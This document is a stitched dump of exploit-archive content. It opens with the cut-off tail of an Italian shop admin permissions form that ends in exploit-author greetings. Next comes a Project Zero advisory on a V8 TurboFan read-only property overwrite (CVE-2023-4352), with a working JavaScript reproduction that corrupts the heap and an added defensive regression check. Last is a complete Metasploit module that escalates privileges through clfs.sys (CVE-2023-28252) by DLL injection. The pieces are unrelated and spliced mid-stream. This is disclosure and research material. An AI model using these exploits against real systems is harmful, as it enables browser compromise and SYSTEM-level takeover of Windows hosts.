style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_21" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_21" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>GESTIONE ORDINI</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Ordini da evadere</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_4" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_4" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_4" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_4" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_4" 
style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Ordini evasi</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_22" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_22" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_22" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_22" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_22" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Tutti gli Ordini</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_23" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_23" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_23" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option 
value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_23" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_23" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>ANAGRAFICA CLIENTI</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Clienti Privati</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_3" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_3" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_3" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_3" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_3" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option 
value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Clienti Aziendali</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_25" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_25" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_25" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_25" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_25" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Tutti i Clienti</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_26" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_26" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_26" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_26" 
style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_26" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>STATISTICHE</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Statistiche</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_6" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_6" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_6" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_6" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_6" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> </tr><br /> </table><br /> </td><br 
/> </tr> <br /> <br /> <br /> </table><br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>GESTIONE BACKUP</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Backup Istantaneo</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_14" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_14" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_14" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_14" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_14" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Backup automatico</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_27" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_27" 
style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_27" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_27" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_27" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>GESTIONE USER ADMIN</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>User Admin</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_5" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_5" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_5" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_5" 
style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_5" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="tableordini" style="border-collapse:collapse;border:1px solid #ccc;width:100%;margin-bottom:20px;"><br /> <tr><br /> <td class="tdcnt" style="text-align:center;"><h2 style="font-size:16px;"><b>GESTIONE TROVAPREZZI</b></h2></td><br /> </tr><br /> <tr><br /> <td class="tdwhcnt" style="margin:0px;padding:0px;"><br /> <table class="tableordini" style="border-collapse:collapse;width:100%;"><br /> <tr><br /> <td style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Genera File Trovaprezzi</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_30" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_30" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_30" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_30" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_30" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> <td 
style="background:#efefef;text-align:left;border:1px solid #ccc;padding:2px;"><br /> <br /> <h2 style="margin-bottom:5px;"><b>Articoli Trovaprezzi</b></h2><br /> <h2><br /> <br /> VISUAL: <select name="sez_vis_31" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> INSER: <select name="sez_ins_31" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> MODIF: <select name="sez_mod_31" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> ARCHIV: <select name="sez_arc_31" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> CANCEL: <select name="sez_can_31" style="height:20px;width:50px;font-size:12px;"><option value="1" selected="selected">SI</option><option value="0">NO</option></select><br/><br /> <br /> <br /> </h2> <br /> </td><br /> </tr><br /> </table><br /> </td><br /> </tr> <br /> <br /> <br /> </table><br /> <table class="formdati"> <br /> <tr><br /> <td><input type="submit" value="Invia" class="enterbutton" style="margin:20px 0px 0px 32px;"/></td><br /> <td></td><br /> </tr><br /> </table><br /> <br /> </form><br /> </div> <br /> </div><br /></td><br /></tr><br /></table><br /><!-- ******* fine parte centrale pagina *********** --><br /></div><br /><!-- ******** fine del CONTENT *************** --><br /></body></html><br /><br /><br /><br />Greetings to :=========================================================================================================================<br /> |<br />jericho * Larry W. 
Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |<br /> |<br />=======================================================================================================================================<br /></code></pre>
<pre><code>Chrome: Read-only property overwrite in TurboFan<br />
<br />
VULNERABILITY DETAILS<br />
While collecting information for a property store, TurboFan bails out if the property isn't writable[2]. Unfortunately, the branch condition[1] does not include one of the store modes, namely `kDefine`. This allows an attacker to overwrite arbitrary non-configurable, read-only properties. It takes a few extra steps to convince TurboFan to compile a vulnerable function -- see the reproduction case section.<br />
<br />
This issue can be abused to trigger a type confusion in `JsonStringifier::Serialize_`. The function assumes that a `JSRawJson` object can only have a string as its `rawJSON` property value, because `JSRawJson::Create` freezes the object[3] before returning it to the user. Therefore, `Serialize_` doesn't perform a type check before casting the result of `GetProperty` to the string type[4]. `AppendString` might then attempt to concatenate the bogus string[5], corrupting the heap.<br />
<br />
<br />
REFERENCES<br />
https://source.chromium.org/chromium/chromium/src/+/refs/heads/main:v8/src/compiler/access-info.cc;drc=5992439d25f71ce29efa8db1c699b99e8773d41f;l=708<br />
```<br />
PropertyAccessInfo AccessInfoFactory::ComputePropertyAccessInfo(<br />
    MapRef map, NameRef name, AccessMode access_mode) const {<br />
[...]<br />
  while (true) {<br />
    PropertyDetails details = PropertyDetails::Empty();<br />
    InternalIndex index = InternalIndex::NotFound();<br />
    if (!TryLoadPropertyDetails(map, holder, name, &index, &details)) {<br />
      return Invalid();<br />
    }<br />
<br />
    if (index.is_found()) {<br />
      if (access_mode == AccessMode::kStore ||  // *** 1 ***<br />
          access_mode == AccessMode::kStoreInLiteral) {<br />
        DCHECK(!map.is_dictionary_map());<br />
<br />
        // Don't bother optimizing stores to read-only properties.<br />
        if (details.IsReadOnly()) return Invalid();  // *** 2 ***<br />
[...]<br />
}<br />
```<br />
<br />
https://source.chromium.org/chromium/chromium/src/+/main:v8/src/objects/js-raw-json.cc;drc=93e93056e3849e78a8c77fe6fd0c2a0983a0b3f4;l=17<br />
```<br />
MaybeHandle<JSRawJson> JSRawJson::Create(Isolate* isolate,<br />
                                         Handle<Object> text) {<br />
  DCHECK(v8_flags.harmony_json_parse_with_source);<br />
  Handle<String> json_string;<br />
  ASSIGN_RETURN_ON_EXCEPTION(isolate, json_string,<br />
                             Object::ToString(isolate, text), JSRawJson);<br />
  Handle<String> flat = String::Flatten(isolate, json_string);<br />
  if (String::IsOneByteRepresentationUnderneath(*flat)) {<br />
    if (!JsonParser<uint8_t>::CheckRawJson(isolate, flat)) {<br />
      DCHECK(isolate->has_pending_exception());<br />
      return MaybeHandle<JSRawJson>();<br />
    }<br />
  } else {<br />
    if (!JsonParser<uint16_t>::CheckRawJson(isolate, flat)) {<br />
      DCHECK(isolate->has_pending_exception());<br />
      return MaybeHandle<JSRawJson>();<br />
    }<br />
  }<br />
  Handle<JSObject> result =<br />
      isolate->factory()->NewJSObjectFromMap(isolate->js_raw_json_map());<br />
  result->InObjectPropertyAtPut(JSRawJson::kRawJsonInitialIndex, *flat);<br />
  JSObject::SetIntegrityLevel(isolate, result, FROZEN, kThrowOnError).Check();  // *** 3 ***<br />
  return Handle<JSRawJson>::cast(result);<br />
}<br />
```<br />
<br />
https://source.chromium.org/chromium/chromium/src/+/main:v8/src/json/json-stringifier.cc;drc=221294ce14cb14f84afa156f3c590700bc615dc1;l=530<br />
```<br />
JsonStringifier::Result JsonStringifier::Serialize_(Handle<Object> object,<br />
                                                    bool comma,<br />
                                                    Handle<Object> key) {<br />
[...]<br />
  InstanceType instance_type =<br />
      HeapObject::cast(*object).map(cage_base).instance_type();<br />
  switch (instance_type) {<br />
[...]<br />
    case JS_RAW_JSON_TYPE:<br />
      DCHECK(v8_flags.harmony_json_parse_with_source);<br />
      if (deferred_string_key) SerializeDeferredKey(comma, key);<br />
      {<br />
        Handle<JSRawJson> raw_json_obj = Handle<JSRawJson>::cast(object);<br />
        Handle<String> raw_json;<br />
        if (raw_json_obj->HasInitialLayout(isolate_)) {<br />
          // Fast path: the object returned by JSON.rawJSON has its initial map<br />
          // intact.<br />
          raw_json = Handle<String>::cast(handle(<br />
              raw_json_obj->InObjectPropertyAt(JSRawJson::kRawJsonInitialIndex),<br />
              isolate_));<br />
        } else {<br />
          // Slow path: perform a property get for "rawJSON". Because raw JSON<br />
          // objects are created frozen, it is still guaranteed that there will<br />
          // be a property named "rawJSON" that is a String. Their initial maps<br />
          // only change due to VM-internal operations like being optimized for<br />
          // being used as a prototype.<br />
          raw_json = Handle<String>::cast(  // *** 4 ***<br />
              JSObject::GetProperty(isolate_, raw_json_obj,<br />
                                    isolate_->factory()->raw_json_string())<br />
                  .ToHandleChecked());<br />
        }<br />
        builder_.AppendString(raw_json);  // *** 5 ***<br />
      }<br />
[...]<br />
}<br />
```<br />
<br />
<br />
VERSION<br />
Google Chrome 114.0.5735.90 (Official Build)<br />
V8 version 11.6.0<br />
<br />
<br />
REPRODUCTION CASE<br />
```<br />
const PROP_NAME = "rawJSON",<br />
      PROP_VALUE = 0x21212121; // Will be interpreted as a compressed pointer by `Serialize_`.<br />
<br />
let define_property_holder = {};<br />
define_property_holder.for_deprecation = 1; // See below.<br />
<br />
function ReturnHolder() { return define_property_holder; };<br />
class Trigger extends ReturnHolder { // Extend a function that returns a value so that it is possible<br />
                                     // to store on an existing object.<br />
<br />
  [PROP_NAME] = ( // A keyed class property initializer is translated to a `kDefine` store.<br />
<br />
    this[PROP_NAME], // The store operation performed on the target object will always throw in<br />
                     // the interpreter, so the object's map won't be added to the feedback slot.<br />
                     // Emit a load so that its feedback map can be reused by the store.<br />
    PROP_VALUE<br />
  )<br />
};<br />
<br />
for (let i = 0; i < 10; ++i)<br />
  new Trigger; // The store operation has to have a non-empty feedback slot. Use a regular object<br />
               // with the writable target property for that.<br />
<br />
define_property_holder.for_deprecation = 1.1; // Deprecate the map in the feedback vector so that<br />
                                              // it's discarded by TurboFan.<br />
<br />
define_property_holder = JSON.rawJSON("1"); // The special target object.<br />
<br />
try { new Trigger } catch { } // Add the target object map to the load operation's feedback slot.<br />
<br />
%OptimizeFunctionOnNextCall(Trigger);<br />
new Trigger;<br />
<br />
JSON.stringify(define_property_holder);<br />
```<br />
<br />
<br />
CREDIT INFORMATION<br />
Sergei Glazunov of Google Project Zero<br />
<br />
<br />
This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2023-09-05.<br />
<br />
<br />
Related CVE Numbers: CVE-2023-4352.<br />
<br />
<br />
<br />
Found by: glazunov@google.com<br />
<br />
</code></pre>
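The invariant the report above relies on is that a `kDefine` store (what a class field initializer compiles to) onto a frozen object must always fail, no matter which tier of the engine executes it. The following is an added regression-style check written for this page, not code from the Project Zero report or from V8: it drives the same shape of store (a class extending a constructor that returns a pre-existing frozen object) through many iterations so that the engine may tier the constructor up, and verifies that every attempt throws `TypeError`, that the frozen string value is untouched, and that `JSON.stringify` still sees a plain string. The names `ReturnHolder`, `Probe`, `holder` and `FIELD` are chosen for this example; a plain frozen object stands in for the object `JSON.rawJSON` returns, which V8 freezes the same way.

```javascript
const FIELD = 'rawJSON';

// Regression-style check (added example): a class field initializer performs a
// [[DefineOwnProperty]] store. On a frozen object it must throw a TypeError every
// time, whether the constructor runs in the interpreter or has been optimized.
function defineStoreIsRejected(iterations) {
  // Frozen stand-in for the JSON.rawJSON result: an existing, non-writable,
  // non-configurable string property named "rawJSON".
  const holder = Object.freeze({ [FIELD]: '1' });
  const original = holder[FIELD];

  // A base constructor that returns an object makes that object `this` in the
  // derived class, so the field initializer below stores onto `holder`.
  function ReturnHolder() { return holder; }
  class Probe extends ReturnHolder {
    // Keyed class field: a define store of a number over the frozen string.
    [FIELD] = 0x21212121;
  }

  let thrown = 0;
  for (let i = 0; i < iterations; i++) {
    try {
      new Probe();
    } catch (e) {
      if (!(e instanceof TypeError)) {
        return { ok: false, thrown, value: holder[FIELD], serialised: null, reason: String(e) };
      }
      thrown++;
    }
  }

  // An intact holder still serialises as an ordinary object; a non-string
  // rawJSON value is exactly what Serialize_ in the report trusted blindly.
  const serialised = JSON.stringify(holder);
  return {
    ok: thrown === iterations && holder[FIELD] === original && serialised === '{"rawJSON":"1"}',
    thrown,
    value: holder[FIELD],
    serialised,
  };
}

// Companion check through the reflective API: the define must be reported as
// rejected (false) rather than silently overwriting the property.
function reflectDefineIsRejected() {
  const holder = Object.freeze({ [FIELD]: '1' });
  const accepted = Reflect.defineProperty(holder, FIELD, { value: 0x21212121 });
  return !accepted && holder[FIELD] === '1';
}

// When the engine ships JSON.rawJSON, the object it returns must be frozen;
// returns null when the feature is not available in the running engine.
function rawJsonObjectIsFrozen() {
  if (typeof JSON.rawJSON !== 'function') return null;
  return Object.isFrozen(JSON.rawJSON('1'));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(defineStoreIsRejected(20000));
  console.log('Reflect.defineProperty rejected:', reflectDefineIsRejected());
  console.log('JSON.rawJSON result frozen:', rawJsonObjectIsFrozen());
}
```

Running this under a patched engine reports `ok: true` with `thrown` equal to the iteration count; an engine affected by the bug above would, once the constructor is optimized, stop throwing and leave a number in `holder.rawJSON`, which is the condition `Serialize_` never checked for.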
<pre><code>##<br />
# This module requires Metasploit: https://metasploit.com/download<br />
# Current source: https://github.com/rapid7/metasploit-framework<br />
##<br />
<br />
class MetasploitModule < Msf::Exploit::Local<br />
  Rank = GoodRanking<br />
<br />
  include Msf::Exploit::Local::WindowsKernel<br />
  include Msf::Post::File<br />
  include Msf::Post::Windows::Priv<br />
  include Msf::Post::Windows::Process<br />
  include Msf::Post::Windows::ReflectiveDLLInjection<br />
  prepend Msf::Exploit::Remote::AutoCheck<br />
  include Msf::Post::Windows::Version<br />
<br />
  def initialize(info = {})<br />
    super(<br />
      update_info(<br />
        info,<br />
        {<br />
          'Name' => 'Windows Common Log File System Driver (clfs.sys) Elevation of Privilege Vulnerability',<br />
          'Description' => %q{<br />
            A privilege escalation vulnerability exists in the clfs.sys driver which comes installed by default on<br />
            Windows 10 21H2, Windows 11 21H2 and Windows Server 20348 operating systems.<br />
<br />
            The clfs.sys driver contains a function CreateLogFile that is used to create,<br />
            open and edit '*.blf' (base log format) files. Inside a .blf file there are multiple blocks of data which<br />
            contain checksums to verify the integrity of the .blf file and to ensure the file looks and acts like a<br />
            .blf file. However, these files can be edited with CreateFileA or with fopen and then modified with<br />
            WriteFile or fwrite respectively in order to change the contents of the file and update their checksums accordingly.<br />
<br />
            This exploit makes use of two different kinds of specially crafted .blf files that are edited using the technique<br />
            mentioned above. There are multiple spray .blf files. The spray .blf files are specially crafted to initiate an out of<br />
            bounds read which reads from a contiguous block of memory. The block of memory it reads from contains a read-write pipe<br />
            that points to the address of the second type of .blf file - the trigger .blf file. The trigger .blf file is specially<br />
            crafted to read the SYSTEM token and write it into the exploit's process to achieve the local privilege escalation.<br />
<br />
            The exploit creates a controlled memory space by first looping over the CreatePipe function<br />
            to create thousands of read-write pipes (which take up 0x90 bytes of memory). It then releases a certain number of<br />
            pipes from memory and calls CreateLogFile to open the pre-existing spray .blf files which, when being opened, fill the<br />
            0x90 byte gaps created by the deallocation of the pipes in memory, creating the controlled memory space.<br />
<br />
            This is a very brief, high-level description of what the exploit is actually doing. For a more detailed and in<br />
            depth analysis please refer to the following [reference](https://github.com/fortra/CVE-2023-28252).<br />
          },<br />
          'License' => MSF_LICENSE,<br />
          'Author' => [<br />
            'Ricardo Narvaja', # Original PoC (@ricnar456)<br />
            'Esteban.kazimirow', # Original PoC (@solidclt)<br />
            'jheysel-r7' # msf module<br />
          ],<br />
          'Arch' => [ ARCH_X64 ],<br />
          'Platform' => 'win',<br />
          'SessionTypes' => [ 'meterpreter' ],<br />
          'DefaultOptions' => {<br />
            'EXITFUNC' => 'thread'<br />
          },<br />
          'Targets' => [<br />
            [ 'Windows x64', { 'Arch' => ARCH_X64 } ]<br />
          ],<br />
          'References' => [<br />
            [ 'CVE', '2023-28252' ],<br />
            [ 'URL', 'https://github.com/fortra/CVE-2023-28252' ]<br />
          ],<br />
          'DisclosureDate' => '2023-04-11',<br />
          'DefaultTarget' => 0,<br />
          'Privileged' => true,<br />
          'Notes' => {<br />
            'Stability' => [CRASH_SAFE],<br />
            'Reliability' => [UNRELIABLE_SESSION], # Should always return a session on the first run but after that a session is not guaranteed<br />
            'SideEffects' => []<br />
          },<br />
          'Compat' => {<br />
            'Meterpreter' => {<br />
              'Commands' => %w[<br />
                stdapi_railgun_api<br />
              ]<br />
            }<br />
          }<br />
        }<br />
      )<br />
    )<br />
  end<br />
<br />
  def check<br />
    unless session.platform == 'windows'<br />
      # Non-Windows systems are definitely not affected.<br />
      return Exploit::CheckCode::Safe<br />
    end<br />
<br />
    file_path = get_env('WINDIR') + '\\system32\\drivers\\clfs.sys'<br />
    unless file?(file_path)<br />
      return Exploit::CheckCode::Safe('The target system does not have clfs.sys in system32\\drivers\\')<br />
    end<br />
<br />
    # Build-number match only: a patched host with the same build still reports Appears.<br />
    version = get_version_info<br />
    if version.build_number.between?(Msf::WindowsVersion::Win10_20H2, Msf::WindowsVersion::Win10_21H2) || version.build_number == Msf::WindowsVersion::Win11_21H2 || version.build_number == Msf::WindowsVersion::Server2022<br />
      return CheckCode::Appears("The target is running windows version: #{version.build_number} which has a vulnerable version of clfs.sys installed by default")<br />
    end<br />
<br />
    CheckCode::Safe<br />
  end<br />
<br />
  def exploit<br />
    if is_system?<br />
      fail_with(Failure::None, 'Session is already elevated')<br />
    end<br />
<br />
    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86<br />
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')<br />
    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86<br />
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')<br />
    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64<br />
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')<br />
    end<br />
<br />
    # The DLL expects a little-endian 32-bit length prefix followed by the encoded payload.<br />
    encoded_payload = payload.encoded<br />
    execute_dll(<br />
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2023-28252', 'CVE-2023-28252.x64.dll'),<br />
      [encoded_payload.length].pack('I<') + encoded_payload<br />
    )<br />
<br />
    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')<br />
  end<br />
end<br />
</code></pre>
